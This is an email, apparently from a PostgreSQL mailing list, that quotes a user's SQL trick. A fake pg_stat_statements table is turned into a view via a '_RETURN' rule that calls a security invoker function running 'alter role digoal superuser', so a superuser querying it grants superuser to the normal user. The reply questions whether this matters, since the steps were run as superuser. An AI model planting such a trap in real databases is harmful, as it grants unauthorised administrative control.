On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <digoal@126.com> wrote:
> a normal user get super privilege, use security invoker function.
> postgres=3D> create table pg_stat_statements (
> userid oid ,
> dbid oid ,
> queryid bigint ,
> query text ,
> calls bigint ,
> total_time double precision ,
> rows bigint ,
> shared_blks_hit bigint ,
> shared_blks_read bigint ,
> shared_blks_dirtied bigint ,
> shared_blks_written bigint ,
> local_blks_hit bigint ,
> local_blks_read bigint ,
> local_blks_dirtied bigint ,
> local_blks_written bigint ,
> temp_blks_read bigint ,
> temp_blks_written bigint ,
> blk_read_time double precision ,
> blk_write_time double precision );
>
> postgres=3D> create or replace function f() returns pg_stat_statements as=
$$
>
> declare
> begin
> alter role digoal superuser;
> end;
> $$ language plpgsql security invoker;
> CREATE FUNCTION
>
> postgres=3D> create rule "_RETURN" as on select to pg_stat_statements do
> instead select * from f();
> CREATE RULE
>
> When a super user select the view pg_stat_statements , the normal user
> digoal will granted the superuser role.
>
> Yes, it's a normal operation ,but somebody can use these trick.
>
Everything you just wrote was done as superuser so what's your point?
David J.